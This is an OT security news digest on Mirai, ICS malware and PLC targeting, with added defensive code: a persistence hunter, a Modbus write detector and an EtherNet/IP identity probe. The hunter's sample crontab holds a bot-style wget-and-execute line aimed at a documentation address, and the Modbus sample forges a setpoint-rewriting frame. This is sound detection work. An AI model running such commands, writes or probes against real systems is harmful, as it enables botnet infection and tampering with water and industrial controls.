Daily OT Security News: April 18, 2026

April 18, 2026

Today's items cover a new Mirai variant abusing known vulnerabilities in DVRs and home routers, sabotage-capable malware aimed at water treatment systems, an Iranian cluster targeting Rockwell Automation controllers, an email-borne worm surge on ICS networks, and a Rapid7 report showing exploitation timelines shrinking to days. The common thread is that attackers are reaching industrial environments through long-patched vulnerabilities, internet-exposed devices, and accounts without MFA, so the defensive priorities remain exposure reduction, replacement of end-of-life equipment, and monitoring of industrial protocol traffic for unauthorized writes.

Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet

Security researchers have identified Nexcorium, a new Mirai botnet variant that exploits CVE-2024-3721, a command injection vulnerability in TBK DVR-4104 and DVR-4216 digital video recorders. It also targets Huawei HG532 routers through CVE-2017-17215 and spreads by brute-forcing Telnet with a hardcoded credential list. On an infected device it persists through crontab entries and systemd services, then deletes its own binary from disk to hinder detection. Separately, Palo Alto Networks Unit 42 reported active exploitation of CVE-2023-33538 against end-of-life TP-Link routers, which extends the pool of devices the botnet can recruit. All three bugs are years old and the TP-Link models are no longer supported, so for most owners the realistic mitigation is to replace or isolate the devices and to keep Telnet and management interfaces off the internet.
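The persistence pattern described above (crontab plus systemd, binary later removed from disk) leaves a recognisable trace: scheduled entries that fetch payloads, run from world-writable directories, or point at files that no longer exist. The following hunt script is an added example for this digest, not code from the Nexcorium report or any vendor; the crontab and unit text it scans are constructed samples, and 198.51.100.7 is a documentation (TEST-NET-2) address.

```python
"""Hunt for Mirai-style persistence in user crontabs and systemd units.

Added example; heuristics, not signatures: a job that fetches over the
network, runs from a world-writable directory, or targets a binary that is
missing on disk (what a self-deleting bot leaves behind). Samples are constructed.
"""
import os
import re
import shlex
from dataclasses import dataclass, field

WORLD_WRITABLE = ("/tmp/", "/var/tmp/", "/dev/shm/")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")


@dataclass
class Finding:
    source: str                    # file the entry came from
    entry: str                     # the offending line
    reasons: list[str] = field(default_factory=list)


def cron_commands(text: str):
    """Yield (line, command) for user-crontab lines (5 time fields or @reboot-style)."""
    for line in text.splitlines():
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", s):
            continue  # blank line, comment or environment assignment
        parts = s.split(None, 1) if s.startswith("@") else s.split(None, 5)
        if len(parts) == (2 if s.startswith("@") else 6):
            yield s, parts[-1]


def unit_commands(text: str):
    """Yield (line, command) for ExecStart*/ExecStop* lines of a systemd unit."""
    for line in text.splitlines():
        s = line.strip()
        if s.startswith(("ExecStart", "ExecStop")) and "=" in s:
            cmd = s.split("=", 1)[1].strip().lstrip("-@+!:")  # drop systemd exec prefixes
            if cmd:
                yield s, cmd


def assess(command: str, exists=os.path.exists) -> list[str]:
    """Return the reasons a command looks like bot persistence (empty list = clean)."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        tokens = command.split()
    reasons = []
    if DOWNLOADER_RE.search(command):
        reasons.append("fetches a payload over the network")
    for tok in tokens:
        if tok.startswith(WORLD_WRITABLE):
            reasons.append(f"runs from a world-writable directory: {tok}")
    if tokens and tokens[0].startswith("/") and not exists(tokens[0]):
        reasons.append(f"target missing on disk (self-deleted binary?): {tokens[0]}")
    return list(dict.fromkeys(reasons))  # de-duplicate, keep order


def hunt(sources: dict[str, str], exists=os.path.exists) -> list[Finding]:
    """sources maps a path to its text; .service files are parsed as units, others as crontabs."""
    findings = []
    for path, text in sources.items():
        parser = unit_commands if path.endswith(".service") else cron_commands
        for entry, cmd in parser(text):
            reasons = assess(cmd, exists)
            if reasons:
                findings.append(Finding(path, entry, reasons))
    return findings


# Constructed samples: one benign logrotate job, two bot-style jobs, one bot-style unit.
SAMPLES = {
    "/var/spool/cron/crontabs/root": (
        "# m h dom mon dow command\n"
        "SHELL=/bin/sh\n"
        "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
        "@reboot /tmp/.x/bot >/dev/null 2>&1\n"
        "*/5 * * * * wget -q http://198.51.100.7/bins/arm7 -O /dev/shm/.s && sh /dev/shm/.s\n"
    ),
    "/etc/systemd/system/sysupdate.service": (
        "[Unit]\nDescription=System Update Service\n"
        "[Service]\nExecStart=/var/tmp/.cache/sysupdate\nRestart=always\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
}


def demo() -> list[Finding]:
    # Pretend only /usr paths exist so the sample behaves the same on any machine.
    return hunt(SAMPLES, exists=lambda p: p.startswith("/usr/"))


if __name__ == "__main__":
    for f in demo():
        print(f"{f.source}: {f.entry}\n    " + "\n    ".join(f.reasons))
```

On a real host, feed `hunt()` the contents of `/var/spool/cron/crontabs/*`, `/etc/cron.d/*` (after stripping the extra user field) and `/etc/systemd/system/*.service`, and leave `exists` at its default so the missing-binary check runs against the actual filesystem.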

Source: The Hacker News

ZionSiphon: Sabotage-Capable ICS Malware Targets Israeli Water Infrastructure

Darktrace researchers uncovered ZionSiphon, purpose-built OT/ICS malware designed to sabotage Israeli water treatment and desalination plants by manipulating chlorine dosing and hydraulic pressure over industrial protocols including Modbus, DNP3, and S7comm. A logic flaw in the current build prevents the sabotage routine from running, but the payload itself is complete and could be made operational with minor code changes. Darktrace rates the threat critical and maps it to MITRE ATT&CK for ICS techniques for modifying control parameters and downloading programs to controllers, so the practical concern for operators is unauthorized write traffic to the PLCs that drive dosing and pumping.
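Because the payload works by writing setpoints over Modbus, the detection a water utility most wants is an alert on Modbus/TCP write function codes from hosts that are not the HMI or engineering workstation, and on any write touching the dosing or pressure registers. The following detector is an added example for this digest, not code from Darktrace or the ZionSiphon analysis: the register map, the authorized-writer address and the three frames are all constructed assumptions standing in for a plant's real documentation and traffic.

```python
"""Flag Modbus/TCP writes that could change a dosing or pressure setpoint.

Added example; SENSITIVE_REGISTERS and AUTHORIZED_WRITERS are assumptions and
the frames in SAMPLE_TRAFFIC are constructed, not captured.
"""
import struct
from dataclasses import dataclass
from typing import Optional

# Function codes that change process state (Modbus Application Protocol V1.1b3).
WRITE_FUNCTIONS = {
    0x05: "Write Single Coil",
    0x06: "Write Single Register",
    0x0F: "Write Multiple Coils",
    0x10: "Write Multiple Registers",
    0x16: "Mask Write Register",
    0x17: "Read/Write Multiple Registers",
}
# Assumed holding-register map (0-based PDU addresses) for a chlorination skid.
SENSITIVE_REGISTERS = {
    0: "chlorine dosing setpoint",
    1: "discharge pressure setpoint",
}
AUTHORIZED_WRITERS = {"10.10.1.5"}  # assumed HMI / engineering workstation


@dataclass
class ModbusRequest:
    src: str
    transaction_id: int
    unit_id: int
    function: int
    address: Optional[int]
    values: list[int]


def parse_modbus_tcp(src: str, frame: bytes) -> ModbusRequest:
    """Parse the MBAP header and PDU of a request; decode the write payloads we alert on."""
    if len(frame) < 8:
        raise ValueError("frame too short for MBAP header + function code")
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    if proto != 0 or length != len(frame) - 6:   # MBAP length counts unit id + PDU
        raise ValueError("not a well-formed Modbus/TCP frame")
    fc, pdu = frame[7], frame[8:]
    address, values = None, []
    if fc in (0x05, 0x06):                        # address, value
        address, value = struct.unpack(">HH", pdu[:4])
        values = [value]
    elif fc == 0x10:                              # start, quantity, byte count, registers
        address, qty, nbytes = struct.unpack(">HHB", pdu[:5])
        if nbytes != 2 * qty or len(pdu) < 5 + nbytes:
            raise ValueError("byte count does not match quantity")
        values = list(struct.unpack(f">{qty}H", pdu[5:5 + nbytes]))
    elif fc in (0x0F, 0x16, 0x17):                # only the start address is needed for alerting
        (address,) = struct.unpack(">H", pdu[:2])
    return ModbusRequest(src, tid, unit, fc, address, values)


def evaluate(req: ModbusRequest) -> list[str]:
    """Alert on writes from unauthorized hosts and on any write that lands on a sensitive register."""
    if req.function not in WRITE_FUNCTIONS:
        return []
    name = WRITE_FUNCTIONS[req.function]
    alerts = []
    if req.src not in AUTHORIZED_WRITERS:
        alerts.append(f"{req.src}: {name} to unit {req.unit_id} from unauthorized host")
    if req.function in (0x06, 0x10):              # holding-register writes carry decoded values
        for offset, value in enumerate(req.values):
            reg = req.address + offset
            if reg in SENSITIVE_REGISTERS:
                alerts.append(f"{req.src}: {name} sets {SENSITIVE_REGISTERS[reg]} (register {reg}) to {value}")
    return alerts


def build_frame(tid: int, unit: int, fc: int, payload: bytes) -> bytes:
    """Assemble MBAP header + PDU; the length field counts unit id + PDU."""
    pdu = bytes([fc]) + payload
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


# Constructed traffic: a benign read, an authorized setpoint change, and a rogue host
# rewriting both setpoints with a single Write Multiple Registers request.
SAMPLE_TRAFFIC = [
    ("10.10.1.5", build_frame(1, 1, 0x03, struct.pack(">HH", 0, 10))),
    ("10.10.1.5", build_frame(2, 1, 0x06, struct.pack(">HH", 0, 150))),
    ("10.10.7.77", build_frame(3, 1, 0x10, struct.pack(">HHB", 0, 2, 4) + struct.pack(">HH", 900, 650))),
]


def scan(traffic=SAMPLE_TRAFFIC) -> list[str]:
    return [a for src, frame in traffic for a in evaluate(parse_modbus_tcp(src, frame))]


if __name__ == "__main__":
    print("\n".join(scan()))
```

The authorized HMI's own setpoint change still produces an alert, deliberately: a compromised engineering workstation is the usual way such a payload reaches the PLC, so sensitive-register writes should be logged and reviewed even when the source is expected.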

Source: Darktrace Research / TechJack Solutions

Iranian Cyber Actors (Cyber Av3ngers) Escalate Targeting of OT/ICS Devices

Palo Alto Networks Unit 42 has identified a new Iranian threat cluster, CL-STA-1128 (also tracked as Cyber Av3ngers), stepping up attacks on Rockwell Automation OT/ICS devices. The group has shifted its focus from Unitronics PLCs to Allen-Bradley controllers and has installed Rockwell's FactoryTalk software on VPS hosts to interact with its targets. Internet-wide scanning since April 1 has found more than 5,600 exposed Rockwell Automation devices, and CISA has confirmed ongoing exploitation of Allen-Bradley PLCs. Unit 42 also observed a sharp rise in activity from Iranian IP space against these devices, pointing to a significant escalation of hostile operations against industrial environments. Any Rockwell controller reachable from the internet on EtherNet/IP (TCP/UDP 44818) should be treated as a target and removed from direct exposure.
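The "exposed Rockwell devices" count comes from exactly the kind of fingerprinting an asset owner can run against their own ranges: an EtherNet/IP ListIdentity probe on port 44818, whose reply carries the ODVA vendor ID, device type, revision, serial number and product name. The code below is an added example for this digest, not Unit 42 or CISA tooling; the reply it parses is constructed, and the product code, serial, status and product name in it are illustrative values rather than a catalogue lookup.

```python
"""Build an EtherNet/IP ListIdentity probe and parse the reply.

Added example. Encapsulation header and CIP Identity item layout follow the
EtherNet/IP specification; SAMPLE_REPLY is constructed, not captured.
"""
import socket
import struct
from dataclasses import dataclass

ENIP_PORT = 44818
CMD_LIST_IDENTITY = 0x0063
ITEM_CIP_IDENTITY = 0x000C
VENDOR_ROCKWELL = 1          # ODVA vendor ID 1 = Rockwell Automation/Allen-Bradley
DEVICE_TYPE_PLC = 0x0E       # CIP device profile: Programmable Logic Controller
HEADER = "<HHII8sI"          # command, length, session, status, sender context, options


@dataclass
class Identity:
    ip: str
    port: int
    vendor_id: int
    device_type: int
    product_code: int
    revision: str
    status: int
    serial: int
    product_name: str
    state: int


def list_identity_request(context: bytes = b"\x00" * 8) -> bytes:
    """24-byte encapsulation header with an empty body; no session is needed."""
    return struct.pack(HEADER, CMD_LIST_IDENTITY, 0, 0, 0, context, 0)


def parse_list_identity(reply: bytes) -> list[Identity]:
    """Decode every CIP Identity item in a ListIdentity reply."""
    if len(reply) < 24:
        raise ValueError("short encapsulation header")
    cmd, length, _session, status, _ctx, _opts = struct.unpack(HEADER, reply[:24])
    if cmd != CMD_LIST_IDENTITY or status != 0:
        raise ValueError("not a successful ListIdentity reply")
    body = reply[24:24 + length]
    if len(body) != length:
        raise ValueError("truncated reply")
    (count,) = struct.unpack("<H", body[:2])
    off, found = 2, []
    for _ in range(count):
        item_type, item_len = struct.unpack("<HH", body[off:off + 4])
        off += 4
        item, off = body[off:off + item_len], off + item_len
        if item_type != ITEM_CIP_IDENTITY or len(item) < 33:
            continue
        # item[0:2] encapsulation version (LE); item[2:18] sockaddr_in in network byte order
        (port,) = struct.unpack(">H", item[4:6])
        ip = socket.inet_ntoa(item[6:10])
        vendor, dev_type, product, rev_major, rev_minor, dev_status, serial = \
            struct.unpack("<HHHBBHI", item[18:32])
        name_len = item[32]
        if len(item) < 34 + name_len:
            continue
        name = item[33:33 + name_len].decode("ascii", "replace")
        state = item[33 + name_len]
        found.append(Identity(ip, port, vendor, dev_type, product, f"{rev_major}.{rev_minor}",
                              dev_status, serial, name, state))
    return found


def build_identity_item(ip, port, vendor, dev_type, product, rev, status, serial, name, state) -> bytes:
    """Inverse of the parser, used here only to construct a sample reply."""
    sockaddr = struct.pack(">hH4s8x", 2, port, socket.inet_aton(ip))   # AF_INET = 2
    fields = struct.pack("<HHHBBHI", vendor, dev_type, product, rev[0], rev[1], status, serial)
    body = struct.pack("<H", 1) + sockaddr + fields + bytes([len(name)]) + name.encode("ascii") + bytes([state])
    return struct.pack("<HH", ITEM_CIP_IDENTITY, len(body)) + body


def build_list_identity_reply(items: list[bytes]) -> bytes:
    body = struct.pack("<H", len(items)) + b"".join(items)
    return struct.pack(HEADER, CMD_LIST_IDENTITY, len(body), 0, 0, b"\x00" * 8, 0) + body


def is_exposed_rockwell(identity: Identity) -> bool:
    return identity.vendor_id == VENDOR_ROCKWELL


def probe(host: str, timeout: float = 2.0) -> list[Identity]:
    """Send the probe over UDP to a host you are authorized to test (not run by the sample)."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(list_identity_request(), (host, ENIP_PORT))
        data, _ = s.recvfrom(4096)
    return parse_list_identity(data)


# Constructed reply from one controller; product code, serial, status and name are illustrative.
SAMPLE_REPLY = build_list_identity_reply([
    build_identity_item("192.0.2.10", ENIP_PORT, VENDOR_ROCKWELL, DEVICE_TYPE_PLC, 0x5F,
                        (20, 11), 0x0030, 0x00C0FFEE, "1769-L33ER/A LOGIX5333ER", 3),
])


def demo() -> list[Identity]:
    return [i for i in parse_list_identity(SAMPLE_REPLY) if is_exposed_rockwell(i)]
```

Run `probe()` only against addresses you own or are authorized to test; a ListIdentity reply from a routable address is exactly what the scanning described above counts as an exposed device.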

Source: Palo Alto Networks Unit 42 / CISA

Email-Borne Worm Surge Drives New Threat Wave Across Industrial Control Systems

Kaspersky Securelist reports a global surge in email-borne worm activity against ICS environments in Q4 2025. The Backdoor.MSIL.XWorm malware, delivered through phishing campaigns posing as job applications, reached ICS networks worldwide within two months, with the highest infection rates in the oil and gas sector, particularly in Russia and Central Asia. Once on a host it establishes persistence and a remote-control channel that can be used to interfere with OT processes. Over the same period, worm blocks on ICS computers rose by 60%.

Source: Kaspersky Securelist / Cyber Security News

Rapid7 2026 Global Threat Landscape Report: Critical Vulnerabilities Surged 105%, Attack Timelines Collapsed

Rapid7's 2026 Global Threat Landscape Report records a 105% increase in exploited high- and critical-severity vulnerabilities from 2024 to 2025. The median time from disclosure to a vulnerability's addition to CISA's KEV catalog, which requires evidence of in-the-wild exploitation, has fallen to five days, so patch windows for internet-facing systems are now measured in days rather than weeks. Nearly 44% of incident response investigations involved valid accounts without MFA, and ransomware featured in 42% of MDR cases. The report also notes AI-assisted acceleration of attacks and evasion techniques such as "Living Off the App" adopted by APT groups.

Source: Rapid7 / Cyber Risk Leaders
